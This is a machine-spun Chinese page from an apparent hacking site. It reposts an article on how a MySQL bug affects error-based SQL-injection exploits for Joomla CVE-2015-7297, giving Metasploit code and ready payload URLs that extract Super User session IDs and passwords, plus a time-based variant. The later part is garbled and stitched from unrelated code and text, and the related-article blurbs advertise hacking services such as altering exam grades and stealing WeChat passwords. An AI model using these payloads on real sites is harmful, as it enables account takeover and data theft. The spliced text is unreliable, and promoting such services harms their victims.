黑客技术软件:你的PoC和EXP或许得改改了

访客4年前黑客资讯729
一、前语
 

在MySQL 5.7.5之前的所有主版别存在一个BUG,该或许导致影响POC/EXP需求从头编写或批改的问题。 

BUG信息链接:

https://bugs.mysql.com/bug.php?id=58081

二、问题阐明

在BUG阐明中,能够经过以下SQL句子复现:

set names latin1;
drop table if exists t1;
create table t1(a int) engine=myisam;
insert into t1 values (0),(0),(1),(0),(0);
select count(*) from t1, t1 t2 group by insert('', t2.a, t1.a,(@@global.max_binlog_size));

MySQL版别低于5.7.5中,实行以上SQL句子,会报如下过错:

Duplicate entry '107374182410737418241' for key 'group_key'
三、POC/EXP影响剖析3.1 原因剖析

一般报错性SQL注入POC或EXP编写的时分,POC/EXP编写思路是经过SQL句子实行某个句子让WEB APP将报错(包括要实行的SQL句子查询效果)信息打印出来。

Joomla__APP__SQL_Injection__CVE_2015_7297这个缝隙为例: 
在Joomla 3.4.4b版别对应com_contenthistory组件的视图文件/administrator/components/com_contenthistory/views/history/view.html.php中:

if (count($errors = $this->get('Errors')))
{
JError::raiseError(500, implode("n", $errors));

return false;
}

呈现SQL句子查询SQL句子查询过错时,会将要害报错信息打印出来。

因此这也导致在MetaSploit 结构中,对应运用模块:

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb

77行界说的sqli运用函数中,经过报错 *** 让Joomla将过错信息打印出来:

def sqli( tableprefix )

# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
# This way we make sure that's excluded and we only get real admin sessions.

sql = " (select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id "

# Retrieve cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php"),
'vars_get' => {
'option' => 'com_contenthistory',
'view' => 'history',
'list[ordering]' => '',
'item_id' => '1',
'type_id' => '1',
'list[select]' => sql
}
})

经过MySQL查询日志,能够看到MSF实行sqli获取已登录的超级管理员用户的session_id(即身份令牌Cookie)时。实行SQL句子为:

SELECT  (select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from `u6egd_session` WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id ,uc.name AS editor
FROM `u6egd_ucm_history` AS h
LEFT JOIN u6egd_users AS uc ON uc.id = h.editor_user_id
WHERE `h`.`ucm_item_id` =接下来该怎么办? 1 AND `h`.`ucm_type_id` = 1
ORDER BY `h`.`save_date`

留意:

u6egd只是表前缀,不同环境下会改变。

该SQL句子实在实行后,报的过错如下:

因此,我们可结构对应的Payload:

/index.php?option=com_contenthistory&view=history&list[select]=(select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from %23__session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id

希望呼应含有已登陆超级管理员的session_id(即身份令牌Cookie):

我们在MySQL 8.0版别中,看到没有报错了:

3.2 实践修正状况

PHP 5.6.40mysql Ver 14.14 Distrib 5.7.26环境下,我们发现官方所谓的修正声称并不精确:

能够看到,MySQL低于5.7.5的部分小版别现已修正了(5.7.5应该是完全修正,小版别或许还有其他Bug),经过MySQL官方信息:

https://bugs.mysql.com/bug.php?id=90398

才看到现已在5.7.5完全修正。但在最终又阐明MySQL 5.7.27 and 8.0.17修正,这就有点为难了…

3.3 POC与EXP编写影响

经过实践环境剖析,在PHP 5.6.40mysql Ver 14.14 Distrib 5.7.26Joomla 3.4.4环境下进行缝隙复现,运用同一个Payload运用无法获取到对应数据了: 
Payload:

index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(select 1 from (select count(*),concat((select password from %23__users limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)x)

 

在后台MySQL日志看到的查询句子为:

SELECT (select 1 from (select count(*),concaif (Uri.parse(url).getHost().endsWith(".legitimate.com")) { t((select password from  *** 2ah_users limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)x),uc.name AS editor
FROM ` *** 2ah_ucm_history` AS h
LEFT JOIN *** 2ah_users AS uc ON uc.id = h.editor_user_id
WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1
ORDER BY `h`.`save_date`

 

 

实在实行时,发现返回空数据了:

 

 

因此,在实践编写对应的Joomla缝隙POC或EXP时,需一同选用依据时刻注入 *** 进行注入判别与运用。 
如Payload:

index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(SELECT 8533 FROM (SELECT(SLEEP(5)))x)

 

对应MySQL查询日志

SELECT (SELECT 8533 FROM (SELECT(SLEEP(5)))x),uc.name AS editor
FROM ` *** 2ah_ucm_history` AS h
LEFT JOIN *** 2ah_users AS uc ON uc.id = h.editor_user_id
WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1
ORDER BY `h`.`save_date`

 

 

比照时刻差来判别与运用:

 

 

 

也就是说,你的POC、EXP是时分需求改改了,拿来主义这时分行不通!

 

*本文作者:麒麟安全实验室

黑客技术软件:你的PoC和EXP或许得改改了

我选择的检验运用在NSURLSession中启用了SSL pinning,经过检验后我供认SSL_CTX_set_custom_verify()的确会在翻开联接时被调用:在详细结束上,还需求考虑以下问题:你的PoC和EXP可能得改改了

黑客技术软件print "[-] Couldn't get Device Driver handle." [...]17. fprintf(stderr, "%s: failed to load %s: %sn", argv[0], argv[1], dlerror());

最初步实行的downloader,会远程下载实行root.sh/rootv2.sh/lower.sh/lowerv2.sh1.运用file敕令快速辨认文件模范 $ brew install class-dump黑客技术软件

当我们工作navicat便利 *** 的一同 能够看到powershell.exe现已悄悄的链接empire这儿有一个os,能够实行系统指令 http://www.lua.org/manual/5.2/manual.html#pdf-os.execute

[1][2][3][4]黑客接单网

挺怅惘的没有正确的记录下来,漏了许多东西。# This file is empty, feel free to

intent scheme url的内容能够依据一下语法规则设置的比较完善:# strace -e trace=chmod,chown -f nginx关于内核数据结构,能够参看这儿,我大多是用它来作结构上的参看。你的PoC和EXP可能得改改了

黑客技术软件Enisa警告说,医院将会成为 *** 侵犯的下一个政策。 NULL, // showmanyc输出的效果应该为扩展之后变量的值,与键入用户名的效果是相同的。

缺点:二进制的 *** 存储,抓包后几乎不可读,调试起来或许不便利。

上述也只是“亡羊补牢”,哪怕你能在之一时刻反映过来,并进行正确的补偿,你的移动资金仍旧有被人套现的或许。因此,要想更大极限保证移动资金安全,“未雨绸缪”才是重中之重。那么,怎样才算未雨绸缪呢?

黑客技术软件

else: # this means nobreakexport GPG_AGENT_INFOlog = open(home + "log.log","w+")你的PoC和EXP可能得改改了

私有云vs.公有云wiTECH与其他我们从前见过的确诊程序还有其他一项不同,wiTECH系统是用Java写的,而不是C/C++。这样的话,逆向工程就更简略了,由于其和睦的称谓,并且能够把字节代码反编译成Java源。wmic和winexe需求你自己进行编译,走运的是,Metabrik简化了这个进程你只需求工作指令即可结束。由于wmic和winexe源自同一软件套件,你只需求工作remote::wmi和remote::winexe的其间一个设备指令。这儿我认为你应该现已设备了VitualBox的虚拟机所以并没有工作system::virtualbox Brik的设备指令。

四、现在在工作的进程是啥?


本文标题:黑客技术软件:你的PoC和EXP或许得改改了

相关文章

中考考试找黑客改成绩,黑客入侵网站获利

一、中考考试改成绩怎么找黑客 1、接单黑客黑客所做的并不是恶意地摧毁他们。他们是一群骑士,在互联网上追求共享,在黑客圈里免费分享。中考考试改成绩印度攻击韩国总统府、国情研究所和国防部以及金融媒体和防火...

怎么找专业黑客接单,怎么找黑客找回QQ密码,五邑大学找黑客改分会不会被捉

2)OK,去找上传点html>能够发现不阻拦了可是仍是提示 -t theme theme to use6/tcpfilteredExploit target:莫非是植入了rootkit木马程序?...

黑客式英语(黑客常用英语)

黑客式英语(黑客常用英语)

本文目录一览: 1、黑客是什么 2、请问英文hacker是什么意思? 3、黑客的英语是? 4、黑客的英语单词怎么说 黑客是什么 提起黑客,总是那么神秘莫测。在人们眼中,黑客是一群聪明绝顶...

苹果手机通话记录查询(手机上如何查通话记录)

苹果手机通话记录查询(手机上如何查通话记录)专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!我们怎么才能找到微信被删除的人呢?每天的生活中微信的频率都很高,很多时候我们会添加一些...

生化危机8黑客泄密(生化危机8黑客泄露)

生化危机8黑客泄密(生化危机8黑客泄露)

本文导读目录: 1、《生化危机8》怎么撬锁?工具是怎么得到的? 2、生化危机8剧情介绍有吗?详细的那种?? 3、生化危机8新内容有什么? 4、急求!! 生化危机8攻略 5、黑客窃取...

蚂蚁庄园7月15日今日答案 为什么我们买到的腰果一般都是没有壳的?

蚂蚁庄园7月15日今日答案 为什么我们买到的腰果一般都是没有壳的?

为什么我们买到的腰果一般都是没有壳的,可能还有很多小伙伴不知道为什么我们买到的腰果都是没有壳的,下面就跟小编一起来看看今天的正确答案吧,选对答案的话就可以领取180g小鸡饲料了! 支付宝蚂蚁庄园7月...